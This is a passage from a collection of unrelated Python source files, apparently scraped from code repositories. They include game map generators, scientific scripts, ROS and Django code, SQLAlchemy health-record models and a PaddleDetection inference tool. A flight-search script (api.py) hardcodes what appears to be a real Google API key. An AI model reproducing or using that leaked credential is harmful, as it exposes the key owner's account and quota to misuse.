dinner!\")\n        break\n\n\n\n","sub_path":"files/dungeon.py","file_name":"dungeon.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"143025404","text":"\"\"\"Random walk algorithm in a grid.\"\"\"\n\nfrom maps import const\nfrom maps import grid\nimport random\n\n\nclass RandomWalk(grid.Grid):\n    \"\"\"Implement the Random walk algorithm.\"\"\"\n\n    def __init__(self, height=25, width=25):\n        \"\"\"Constructor for a grid map filled with walls.\"\"\"\n        super().__init__(height, width)\n        self._filled = int(self._area * 0.4)\n\n    def generate_grid(self):\n        \"\"\"Generate a cave style grid with Random Walk algorithm.\"\"\"\n        coord = (self._height - 1, random.randint(1, self._width - 2))\n        self._grid[coord[0]][coord[1]] = const.FLOOR\n\n        direction = [(-1, 0), (0, 1), (1, 0), (0, -1)]\n        while self._filled > 0:\n            step = random.choice(direction)\n\n            if not self.is_border(coord[0] + step[0], coord[1] + step[1]):\n                coord = (coord[0] + step[0], coord[1] + step[1])\n                if self._grid[coord[0]][coord[1]] == const.WALL:\n                    self._grid[coord[0]][coord[1]] = const.FLOOR\n                    self._filled -= 1\n","sub_path":"maps/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"43366204","text":"#\n#\n#Problem 4:\n#\n#\nfrom hwk_6_p3 import search # write once, use often!\nfrom requests import get # this function gets a webpage's contents. used to compare with socket.\n\ndef req_page(URL):\n\t'''Uses the requests package to handle redirects as alternative to socket connection. Returns page contents as string'''\n\tif URL.startswith('http://'):\n\t\tURL = URL[len('http://'):] # str.strip would drop characters, not the prefix; this lets the function take full weblink input if someone does that for some reason\n\taddress='http://{}'.format(URL).encode('utf-8') # make the full url\n\tpage=get(address) # get() listens on port 80 by default\n\twhile True:\n\t\ttry:\n\t\t\tcontents=str(page.text) # take just the text from get() output\n\t\texcept Exception:\n\t\t\tprint('contents not stringable')\n\t\telse:\n\t\t\treturn(contents)\n\nif __name__==\"__main__\":\n\turl='web.physics.ucsb.edu/~phys129/lipman/'\n\tpage=req_page(url)\n\tlatest=search('Latest update',page) #search the webpage contents\n\t#reformat output\n\tlatest=latest.replace('','').replace('

','')\n\tlatest=latest.replace(' ',' ').replace(',','')\n\tprint(latest)\n\n## SCRIPT OUTPUT\n\n# $python3 hwk_6_p3.py \n# Latest update: Wednesday June 20","sub_path":"Homework_6/hwk_6_p4.py","file_name":"hwk_6_p4.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"172414939","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport astropy.units as u\nimport astropy.constants as const\nfrom astropy.coordinates import SkyCoord\nfrom EXOSIMS.Prototypes.TargetList import TargetList\n\nclass KnownRVPlanetsTargetList(TargetList):\n \"\"\"Target list based on population of known RV planets from IPAC.\n Intended for use with the KnownRVPlanets family of modules.\n \n Args: \n \\*\\*specs: \n user specified values\n \n \"\"\"\n\n def __init__(self, **specs):\n \n #define mapping between attributes we need and the IPAC data\n #table loaded in the Planet Population module\n self.atts_mapping = {'Name':'pl_hostname',\n 'Spec':'st_spstr',\n 'parx':'st_plx',\n 'Umag':'st_uj',\n 'Bmag':'st_bj',\n 'Vmag':'st_vj',\n 'Rmag':'st_rc',\n 'Imag':'st_ic',\n 'Jmag':'st_j',\n 'Hmag':'st_h',\n 'Kmag':'st_k',\n 'dist':'st_dist',\n 'BV':'st_bmvj',\n 'L':'st_lum', #ln(solLum)\n 'pmra':'st_pmra', #mas/year\n 'pmdec':'st_pmdec', #mas/year\n 'rv': 'st_radv'}\n \n TargetList.__init__(self, **specs)\n\n def populate_target_list(self, **specs):\n \n PPop = self.PlanetPopulation\n Comp = self.Completeness\n OS = self.OpticalSystem\n ZL = self.ZodiacalLight\n \n tmp = PPop.allplanetdata[:]\n # filter out targets with planets outside of WA range \n dist = tmp['st_dist'].filled()*u.pc\n mask = ~tmp['st_dist'].mask \\\n & (np.arctan(PPop.sma*(1 + PPop.eccen)/dist) > OS.IWA) \\\n & (np.arctan(PPop.sma*(1 - PPop.eccen)/dist) < OS.OWA)\n tmp = tmp[mask]\n # filter out redundant targets\n tmp = tmp[np.unique(tmp['pl_hostname'].data, return_index=True)[1]]\n \n # filter missing Vmag and BV, for integration time calculation\n tmp = tmp[~tmp['st_vj'].mask]\n tmp = tmp[~tmp['st_bmvj'].mask]\n \n self.nStars = len(tmp)\n assert self.nStars, \"Target list is empty: nStars = %r\"%self.nStars\n \n for att in self.atts_mapping:\n ma = tmp[self.atts_mapping[att]]\n if type(ma.fill_value) == np.float64:\n setattr(self, att, ma.filled(np.nanmedian(ma)))\n else:\n if (att == 'Name') or (att == 'Spec'):\n setattr(self, att, ma.data.astype(str))\n else:\n setattr(self, att, ma.data)\n # astropy units\n self.parx = self.parx*u.mas\n self.dist = self.dist*u.pc\n self.pmra = self.pmra*u.mas/u.yr\n self.pmdec = self.pmdec*u.mas/u.yr\n self.rv = self.rv*u.km/u.s\n \n self.BC = -2.5*self.L - 26.832 - self.Vmag\n self.L = 10.**self.L\n self.MV = self.Vmag - 5*(np.log10(self.dist.to('pc').value) - 1)\n self.coords = SkyCoord(ra=tmp['ra']*u.deg, dec=tmp['dec']*u.deg, \n distance=self.dist)\n self.Binary_Cut = np.zeros(self.nStars, dtype=bool)\n \n # populate completeness values\n self.comp0 = Comp.target_completeness(self)\n # populate minimum integration time values\n self.tint0 = OS.calc_minintTime(self)\n # calculate 'true' and 'approximate' stellar masses\n self.stellar_mass()\n \n # include new attributes to the target list catalog attributes\n self.catalog_atts.append('comp0')\n self.catalog_atts.append('tint0')\n\n def filter_target_list(self, **specs):\n \"\"\" Filtering is done as part of populating the table, so this \n helper function is just a dummy.\n \n \"\"\"\n \n 
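        # Note (descriptive comment, not in the original source): the actual filtering\n        # (working-angle range vs. IWA/OWA, duplicate host names, missing Vmag/B-V)\n        # already ran in populate_target_list, so there is nothing left to remove here.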
pass\n","sub_path":"EXOSIMS/TargetList/KnownRVPlanetsTargetList.py","file_name":"KnownRVPlanetsTargetList.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"483364331","text":"import json\nimport requests\n\napi_key = \"AIzaSyAMQ-x96aS6dyp_Txngu7SJZhELW2c7SDM\"\nurl = \"https://www.googleapis.com/qpxExpress/v1/trips/search?key=\" + api_key\nheaders = {'content-type': 'application/json'}\n\nparams = {\n \"request\": {\n \"slice\": [\n {\n \"origin\": \"ICN\",\n \"destination\": \"FCO\",\n \"date\": \"2017-08-19\",\n \"maxStops\": 2,\n \"maxConnectionDuration\": 1200,\n }\n ],\n \"passengers\": {\n \"adultCount\": 1,\n \"childCount\": 0,\n },\n \"solutions\": 10,\n \"refundable\": False,\n \"saleCountry\": \"US\",\n }\n}\n\nresponse = requests.post(url, data=json.dumps(params), headers=headers)\ndata = response.json()\n#print data\n\na = data['trips']['tripOption'][0]['slice'][0]['segment'][0].get('connectionDuration', 'bar')\nprint(a)","sub_path":"basic/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"224351894","text":"# This program gets the user's weight, height, age, and gender,\n# determines his/her basal metabolic rate, and returns how\n# many chocolate bars this is equivalent to\n\n# get input from user\nweight = float(input('Enter your weight (in pounds): '))\nheight = float(input('Enter your height (in inches): '))\nage = int(input('Enter your age (in years): '))\ngender = input('Enter your gender (M/F): ')\n\n# calculate BMR\nif (gender == 'M'):\n BMR = 66 + (6.3*weight)+(12.9*height)-(6.8*age)\nelse:\n BMR = 655 + (4.3*weight)+(4.7*height)-(4.7*age)\n\n# output number of chocolate bars\nprint('\\nTo maintain your weight you need to eat ',BMR/230,' chocolate bars')\n","sub_path":"Labs/Lab3/Lab3_1.py","file_name":"Lab3_1.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"558035662","text":"import os\nimport sys\nimport datetime\nfrom sqlalchemy import Column, ForeignKey, Integer, String, Boolean, DateTime, Float\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import create_engine\nfrom .db_connector import connector\n\nBase = declarative_base()\n\nclass User(Base):\n __tablename__ = 'user'\n id = Column(Integer, primary_key=True)\n name = Column(String(250), nullable=False)\n email = Column(String(250),nullable=False)\n password = Column(String(250),nullable=False)\n mobile = Column(String(250),nullable=False)\n location = Column(String(250),nullable=False)\n designation = Column(String(250),nullable=False)\n role =Column(String(250),nullable=False)\n confirmed = Column(Boolean,nullable=False,default=False)\n\n def __init__(self,name,email,password,mobile,location,designation,role,confirmed):\n self.name = name\n self.email = email\n self.password = password\n self.mobile = mobile\n self.location = location\n self.designation = designation\n self.role = role\n self.confirmed = confirmed\n\nclass Device(Base):\n __tablename__ = 'device'\n id = Column(Integer, primary_key=True)\n device_id = Column(String(250), nullable=False)\n email = Column(String(250),nullable=False)\n\n def __init__(self,email,device_id):\n self.device_id = device_id\n self.email = email\n\nclass HeartRate(Base):\n 
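# One heart-rate sample per row; note that date and time are stored as plain strings (String columns), like the other tables in this module.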
__tablename__='heartRate'\n id = Column(Integer, primary_key=True)\n device_id = Column(String(250), nullable=False)\n rate = Column(Integer,nullable=False)\n email = Column(String(250),nullable=False)\n date = Column(String(250),nullable=False)\n time = Column(String(250),nullable=False)\n \n def __init__(self,email,device_id,rate,date,time):\n self.device_id = device_id\n self.rate = rate\n self.email = email\n self.date = date\n self.time = time\n\nclass HeartDetails(Base):\n __tablename__='heartDetails'\n id = Column(Integer, primary_key=True)\n email = Column(String(250),nullable=False)\n age = Column(Integer,nullable=False)\n sex = Column(Integer,nullable=False)\n trestbps = Column(Integer,nullable=False)\n cp = Column(Integer,nullable=False)\n restecg = Column(Integer,nullable=False)\n fbs = Column(Integer,nullable=False)\n chol= Column(Integer,nullable=False)\n thalach = Column(Integer,nullable=False)\n exang = Column(Integer,nullable=False)\n oldpeak = Column(Integer,nullable=False)\n slope = Column(Integer,nullable=False)\n ca = Column(Integer,nullable=False)\n thal = Column(Integer,nullable=False)\n predict = Column(Integer,nullable=False)\n probability = Column(Float,nullable=False)\n\n def __init__(self,email,age,sex,trestbps,cp,restecg,fbs,chol,thalach,exang,oldpeak,slope,ca,thal,predict,prob):\n self.email = email\n self.age = age\n self.sex = sex\n self.trestbps = trestbps\n self.cp = cp\n self.restecg = restecg\n self.fbs = fbs\n self.chol = chol\n self.thalach = thalach\n self.exang = exang\n self.oldpeak = oldpeak\n self.slope = slope\n self.ca = ca\n self.thal = thal\n self.predict = predict\n self.probability = prob\n\nclass PhoneNumbers(Base):\n __tablename__='phoneNumbers'\n id = Column(Integer, primary_key=True)\n email = Column(String(250),nullable=False)\n mobile1 = Column(String(250),nullable=False)\n mobile2 = Column(String(250),nullable=False)\n mobile3 = Column(String(250),nullable=False)\n\n def __init__(self,email,mobile1,mobile2,mobile3):\n self.email=email\n self.mobile1=mobile1\n self.mobile2=mobile2\n self.mobile3=mobile3\n\nengine = create_engine(connector)\n#'sqlite:///computer_jii.db'\nBase.metadata.create_all(engine)","sub_path":"database_connector/dto.py","file_name":"dto.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"600986639","text":"import datetime\nimport json\n\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\n\nfrom MedWeb import settings\nfrom MedWeb.clinical_database.clinical_database import medications\nfrom MedWeb.clinical_judgements.schedule_logic import patient_active_schedules, patient_active_medication_ids\nfrom MedWeb.concentrator_interface.interface import schedules\nfrom MedWeb.concentrator_interface.interface import update_from_concentrator, get_patient_dose_instances\nfrom MedWeb.patient_database.patient_database import patients\n\nsidebar_menu_urls = {\"Medications\": \"/viewpatient\",\n \"Schedule & History\": \"/schedule\",\n \"Add Medication\": \"/assignmedication\"}\n\nsidebar_menu_entries = [\"Medications\", \"Schedule & History\", \"Add Medication\"]\n\n\ndef browse_patients(request):\n template = get_template(\"medication/browse_patients.djt.html\")\n output = template.render({\"title\": settings.SITE_NAME,\n \"version\": settings.version_string,\n \"sections\": settings.SECTIONS,\n \"sidebar_menu_urls\": sidebar_menu_urls,\n \"active_section\": \"patients\",\n 
\"sidebar_menu_entries\": sidebar_menu_entries,\n \"patients\": patients.values(),\n \"warning_count\": sum((patient.warnings for patient in patients.values())),\n \"active_patient\": None}, request)\n return HttpResponse(output)\n\n\ndef patient_summary(request):\n patient_uuid = request.GET.get(\"patient_uuid\", None)\n todayDate = datetime.date.today()\n if patient_uuid is None:\n return browse_patients(request)\n print(patients[patient_uuid].status)\n template = get_template(\"medication/medication_summary.djt.html\")\n dose_instances = get_patient_dose_instances(patient_uuid, todayDate - datetime.timedelta(\n todayDate.weekday()), todayDate - datetime.timedelta(\n todayDate.weekday()) + datetime.timedelta(days=7))\n for dose_instance in dose_instances:\n dose_date = dose_instance.schedule.start_date + datetime.timedelta(days=dose_instance.day)\n dose_instance.start_datetime = datetime.datetime.combine(dose_date, dose_instance.start_time)\n dose_instance.end_datetime = datetime.datetime.combine(dose_date, dose_instance.end_time)\n if dose_instance.start_datetime > datetime.datetime.now():\n dose_instance.color = \"#ADECFF\"\n elif dose_instance.taken_dose_uuid is not None:\n dose_instance.color =\"#8BFF8E\"\n else:\n dose_instance.color = \"#FF8B8E\"\n\n patient_schedules = list(patients[patient_uuid].schedules)\n patient_schedules.sort(key=lambda s: s.medication.short_name)\n patient_schedules.sort(key=lambda s: s.start_date)\n dose_instances.sort(key=lambda d: d.start_datetime)\n dose_instances.sort(key=lambda d: d.schedule.medication.full_name)\n print([schedule for schedule in patient_schedules])\n output = template.render({\"title\": settings.SITE_NAME,\n \"version\": settings.version_string,\n \"sections\": settings.SECTIONS,\n \"sidebar_menu_entries\": sidebar_menu_entries,\n \"sidebar_menu_urls\": sidebar_menu_urls,\n \"active_sidebar_entry\": \"Medications\",\n \"active_section\": \"patients\",\n \"active_patient\": patients[patient_uuid],\n \"dose_instances\": dose_instances,\n \"schedules\": patient_schedules}, request)\n return HttpResponse(output)\n\n\ndef assign_medication(request):\n patient_uuid = request.GET.get(\"patient_uuid\", None)\n if patient_uuid is None:\n return browse_patients(request)\n template = get_template(\"medication/assign_medication.djt.html\")\n active_medications = patient_active_medication_ids(patients[patient_uuid])\n print(active_medications)\n output = template.render({\"title\": settings.SITE_NAME,\n \"version\": settings.version_string,\n \"sections\": settings.SECTIONS,\n \"sidebar_menu_entries\": sidebar_menu_entries,\n \"sidebar_menu_urls\": sidebar_menu_urls,\n \"active_sidebar_entry\": \"Add Medication\",\n \"active_section\": \"patients\",\n \"active_patient\": patients[patient_uuid],\n \"active_patient_medication_ids\": json.dumps(\n active_medications),\n \"medications\": medications.values(),\n }, request)\n return HttpResponse(output)\n\n\ndef create_new_schedule(request):\n patient_uuid = request.GET.get(\"patient_uuid\", None)\n if patient_uuid is None:\n return browse_patients(request)\n medication_id_str = request.GET.get(\"mid\", None)\n if medication_id_str is None:\n return assign_medication(request)\n medication_id = int(medication_id_str)\n template = get_template(\"medication/schedule_editor.html\")\n output = template.render({\"title\": settings.SITE_NAME,\n \"version\": settings.version_string,\n \"sections\": settings.SECTIONS,\n \"active_section\": \"patients\",\n \"sidebar_menu_entries\": sidebar_menu_entries,\n 
\"sidebar_menu_urls\": sidebar_menu_urls,\n \"active_sidebar_entry\": \"Add Medication\",\n \"active_patient\": patients[patient_uuid],\n \"active_medication\": medications[medication_id],\n \"mode\": 'create'}, request)\n return HttpResponse(output)\n\n\ndef modify_schedule(request):\n schedule_id_str = request.GET.get(\"schedule_id\", None)\n if schedule_id_str is None:\n return patient_summary(request)\n schedule_id = int(schedule_id_str)\n print(schedule_id)\n print(schedules)\n exclusive_for_this_medication = len([schedule for schedule in schedules[schedule_id].patient.schedules if schedule.medication_id == schedules[schedule_id].medication_id]) <= 1\n template = get_template(\"medication/schedule_editor.html\")\n output = template.render({\"title\": settings.SITE_NAME,\n \"version\": settings.version_string,\n \"active_section\": \"patients\",\n \"sections\": settings.SECTIONS,\n \"sidebar_menu_entries\": sidebar_menu_entries,\n \"sidebar_menu_urls\": sidebar_menu_urls,\n \"active_sidebar_entry\": \"Medications\",\n \"active_patient\": schedules[schedule_id].patient,\n \"active_schedule\": schedules[schedule_id],\n \"active_medication\": schedules[schedule_id].medication,\n \"mode\": 'modify',\n \"enable_start_date_change\": schedules[schedule_id].start_date > datetime.date.today() and exclusive_for_this_medication}, request)\n return HttpResponse(output)\n\n\ndef query_concentrator(request):\n update_from_concentrator()\n","sub_path":"MedManagementWeb/MedWeb/MedWeb/medication_manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"167730251","text":"from __future__ import division , print_function\nimport sys\nimport os\nimport glob\nimport multiprocessing as mproc\n\n\n\ndef run_command( command_line , sino_file , ang_file ):\n command_line_var = command_line + '-i ' + sino_file + ' -g ' + ang_file\n print( command_line_var )\n os.system( command_line_var ) \n\n\n\n\ndef main():\n path_common_in = '/home/arcusfil/tomcat/Data/poster_benjing_14_04_27/data'\n path_spec_in = 'sin_lung_tissue_dilated_versions_admm_est_noisy/polar'\n path_spec_out = 'sin_lung_tissue_dilated_versions_admm_est_noisy_downsampled/polar'\n\n\n label_sino = '.DMP'\n label_angfile = '.txt'\n\n\n curr_dir = os.getcwd()\n os.chdir( path_common_in + '/' + path_spec_in )\n sino_files = glob.glob( '*' + label_sino + '*' )\n angfile_files = glob.glob( '*' + label_angfile + '*' )\n\n if len( sino_files ) != len( angfile_files ):\n sys.exit('\\nERROR: number of .DMP', len( sino_files ),' differs from number \\\n of .txt files ', len( angfile_files ))\n\n os.chdir( curr_dir )\n\n\n command_line = 'python downsample_sinogram.py '\n command_line += '-Di ' + path_common_in + '/' + path_spec_in + ' '\n command_line += '-Do ' + path_common_in + '/' + path_spec_out + ' ' \n\n\n pool = mproc.Pool()\n for f in range( len( sino_files ) ):\n pool.apply_async( run_command , ( command_line , sino_files[f] ,\n angfile_files[f] ) )\n pool.close()\n pool.join()\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"downsample_sinogram/downsample_sinogram_wrapper.py","file_name":"downsample_sinogram_wrapper.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"322583639","text":"import os, sys, string, glob, math\n\ndef primes(n):\n\tif n < 2: return []\n\tif n == 2: return [2]\n\ts = range(3, n, 2)\n\tmroot 
= n ** 0.5\n\thalf = len(s)\n\ti = 0\n\tm = 3\n\twhile m <= mroot:\n\t\tif s[i]:\n\t\t\tj = (m * m - 3)//2\n\t\t\ts[j] = 0\n\t\t\twhile j < half:\n\t\t\t\ts[j] = 0\n\t\t\t\tj += m\n\t\ti = i + 1\n\t\tm = 2 * i + 3\n\treturn [2]+[x for x in s if x]\n\t\nimport p25\n#import p14\n#import p13\n#import p2\n#import p3\n#import p5\n#import p3\n#import p4\n#import p8\t\n#import p53\n\n","sub_path":"Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"497136213","text":"def longestPalindromicSubstring(string):\n    # Write your code here.\n    longest = \"\"\n    if len(string) == 1:\n        return string\n    for i in range(len(string)):\n        for j in range(i, len(string)):\n            subString = string[i:j+1]\n            if len(subString) > len(longest) and isPalindrome(subString):\n                longest = subString\n    return longest\n\n\ndef isPalindrome(string):\n    # Write your code here.\n    reverse_chars = []\n    for i in reversed(range(len(string))):\n        reverse_chars.append(string[i])\n    return \"\".join(reverse_chars) == string\n","sub_path":"AlgoExpert/longestPalindromicSubstring/n^3.py","file_name":"n^3.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"491348192","text":"#!/usr/bin/env python\nfrom __future__ import division, print_function\nimport rospy\nimport actionlib\nimport sys\n\nfrom amee_controllers.msg import DumbMoveAction, DumbMoveFeedback, DumbMoveResult, DumbMoveGoal\n\n\ndef feedback_cb(feedback):\n    print(feedback)\n\n\ndef position_client(x, y, deg, cancel=False):\n    print('dumb_move_action')\n    client = actionlib.SimpleActionClient('dumb_move_action', DumbMoveAction)\n\n    # Waits until the action server has started up and started\n    # listening for goals.\n    print(\"waiting for server\")\n    client.wait_for_server()\n    print(\"done waiting for server\")\n    # Creates a goal to send to the action server.\n    goal = DumbMoveGoal(x=x, y=y, deg=deg)\n\n    # Sends the goal to the action server.\n    client.send_goal(goal, feedback_cb=feedback_cb)\n\n    if cancel:\n        decision = raw_input(\"Cancel Y/n?\")\n        if not decision.startswith('n'):\n            client.cancel_goal()\n\n    print(\"waiting for result...\")\n    # Waits for the server to finish performing the action.\n    client.wait_for_result()\n\n    # Prints out the result of executing the action\n    return client.get_result() # A DumbMoveResult\n\nif __name__ == '__main__':\n    try:\n        try:\n            x = float(sys.argv[1])\n            y = float(sys.argv[2])\n            deg = float(sys.argv[3])\n        except:\n            x = 8\n            y = 8\n            deg = 0\n\n        cancel = len(sys.argv) < 5\n        print(sys.argv)\n\n        rospy.init_node('dumb_move_action_client')\n        result = position_client(x, y, deg, cancel)\n\n    except rospy.ROSInterruptException:\n        print(\"program interrupted before completion\", file=sys.stderr)\n\n    print(\"done\")\n    rospy.spin()\n","sub_path":"src/amee_controllers/test/dumb_move_action_client.py","file_name":"dumb_move_action_client.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"101745519","text":"from os import system\nfrom config import Bcolors, welcome_message\nimport sys\nfrom server.config import Server\nfrom client.main import Client\n\n\nclass Main:\n\n    def __init__(self):\n        self.running = True\n\n    def start(self):\n\n        try:\n            system('clear')\n            welcome = ''\n            print(Bcolors.OKBLUE + \"WELCOME! 
Choose an option to start\" + Bcolors.ENDC)\n            sys.stdout.write(Bcolors.OKGREEN + welcome + Bcolors.ENDC)\n            print('1 - Create room')\n            print('2 - Join a room')\n            choice = int(input('>>> '))\n\n            if choice == 1:\n                server = Server()\n                server.run()\n                server.start()\n            elif choice == 2:\n                system('clear')\n                client = Client()\n                client.start()\n\n            else:\n                print(Bcolors.FAIL + '--- INVALID COMMAND ---' + Bcolors.ENDC)\n                print('press any key to continue')\n                input()\n\n        except Exception as e:\n            print(e)\n            print(Bcolors.FAIL + '--- AN ERROR OCCURRED ---' + Bcolors.ENDC)\n            print('press any key to continue')\n            input()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"486801114","text":"# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport glob\n\nimport numpy as np\n\nfrom paddle import fluid\n\nfrom ppdet.core.workspace import load_config, merge_config, create\nfrom ppdet.modeling.model_input import create_feeds\nfrom ppdet.data.data_feed import create_reader\n\nfrom ppdet.utils.eval_utils import parse_fetches\nfrom ppdet.utils.cli import parse_args\nfrom ppdet.utils.visualizer import visualize_results\nimport ppdet.utils.checkpoint as checkpoint\n\nimport logging\nFORMAT = '%(asctime)s-%(levelname)s: %(message)s'\nlogging.basicConfig(level=logging.INFO, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\n\ndef get_test_images(infer_dir, infer_img):\n    \"\"\"\n    Get image path list in TEST mode\n    \"\"\"\n    assert infer_img is not None or infer_dir is not None, \\\n        \"--infer-img or --infer-dir should be set\"\n    images = []\n\n    # infer_img has a higher priority\n    if infer_img and os.path.isfile(infer_img):\n        images.append(infer_img)\n        return images\n\n    infer_dir = os.path.abspath(infer_dir)\n    assert os.path.isdir(infer_dir), \\\n        \"infer_dir {} is not a directory\".format(infer_dir)\n    image_exts = ['jpg', 'jpeg', 'png', 'bmp']\n    for fmt in image_exts:\n        images.extend(glob.glob('{}/*.{}'.format(infer_dir, fmt)))\n\n    assert len(images) > 0, \"no image found in {} with \" \\\n        \"extensions {}\".format(infer_dir, image_exts)\n    logger.info(\"Found {} inference images in total.\".format(len(images)))\n\n    return images\n\n\ndef main():\n    args = parse_args()\n    cfg = load_config(args.config)\n\n    if 'architecture' in cfg:\n        main_arch = cfg['architecture']\n    else:\n        raise ValueError(\"'architecture' not specified in config file.\")\n\n    merge_config(args.cli_config)\n\n    if 'test_feed' not in cfg:\n        test_feed = create(main_arch + 'TestFeed')\n    else:\n        test_feed = create(cfg['test_feed'])\n\n    test_images = get_test_images(args.infer_dir, args.infer_img)\n    test_feed.dataset.add_images(test_images)\n\n    place = fluid.CUDAPlace(0) if cfg['use_gpu'] else fluid.CPUPlace()\n    exe = 
fluid.Executor(place)\n\n model = create(main_arch)\n\n startup_prog = fluid.Program()\n infer_prog = fluid.Program()\n with fluid.program_guard(infer_prog, startup_prog):\n with fluid.unique_name.guard():\n _, feed_vars = create_feeds(test_feed, use_pyreader=False)\n test_fetches = model.test(feed_vars)\n infer_prog = infer_prog.clone(True)\n\n reader = create_reader(test_feed)\n feeder = fluid.DataFeeder(place=place, feed_list=feed_vars.values())\n\n exe.run(startup_prog)\n if cfg['weights']:\n checkpoint.load_checkpoint(exe, infer_prog, cfg['weights'])\n\n # parse infer fetches\n extra_keys = []\n if cfg['metric'] == 'COCO':\n extra_keys = ['im_info', 'im_id', 'im_shape']\n keys, values, _ = parse_fetches(test_fetches, infer_prog, extra_keys)\n\n # 6. Parse dataset category\n if cfg['metric'] == 'COCO':\n from ppdet.utils.coco_eval import bbox2out, mask2out, get_category_info\n if cfg['metric'] == \"VOC\":\n # TODO(dengkaipeng): add VOC metric process\n pass\n\n anno_file = getattr(test_feed.dataset, 'annotation', None)\n with_background = getattr(test_feed, 'with_background', True)\n clsid2catid, catid2name = get_category_info(anno_file, with_background)\n\n imid2path = reader.imid2path\n for iter_id, data in enumerate(reader()):\n outs = exe.run(infer_prog,\n feed=feeder.feed(data),\n fetch_list=values,\n return_numpy=False)\n res = {\n k: (np.array(v), v.recursive_sequence_lengths())\n for k, v in zip(keys, outs)\n }\n logger.info('Infer iter {}'.format(iter_id))\n\n im_id = int(res['im_id'][0])\n image_path = imid2path[im_id]\n if cfg['metric'] == 'COCO':\n bbox_results = None\n mask_results = None\n if 'bbox' in res:\n bbox_results = bbox2out([res], clsid2catid)\n if 'mask' in res:\n mask_results = mask2out([res], clsid2catid,\n cfg['MaskHead']['resolution'])\n visualize_results(image_path, catid2name, 0.5, bbox_results,\n mask_results)\n\n if cfg['metric'] == \"VOC\":\n # TODO(dengkaipeng): add VOC metric process\n pass\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"PaddleCV/object_detection/tools/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"174863432","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 15 20:29:28 2018\r\n\r\n@author: Gandhi\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom pylab import rcParams\r\nimport seaborn as sb\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.preprocessing import scale\r\n\r\nfrom collections import Counter\r\nfrom sklearn.metrics import *\r\n\r\n#Loading your dataset\r\nurl = \"https://archive.ics.uci.edu/ml/machine-learning-databases/echocardiogram/echocardiogram.data\"\r\n\r\nEchocardiogram_df = pd.read_csv(url, header= None, error_bad_lines=False, sep=',')\r\ncol = [\"survival \", \"still-alive\", \"age-at-heart-attack\", \"pericardial-effusion\",\"fractional-shortening\", \"E-point septal separation\", \"left ventricular end-diastolic\", \"wall-motion-score\",\"wall-motion-index\",\"mult\",\"name \", \"group \", \"alive-at-1\" ]\r\nEchocardiogram_df.columns = col\r\nprint ('Check first 5 rows of the table ')\r\nprint(Echocardiogram_df.head())\r\n\r\n\r\nprint ('Check Last 5 rows of the table ')\r\nprint(Echocardiogram_df.tail())\r\n# check the total number of rows and column\r\n\r\nprint ('Print 
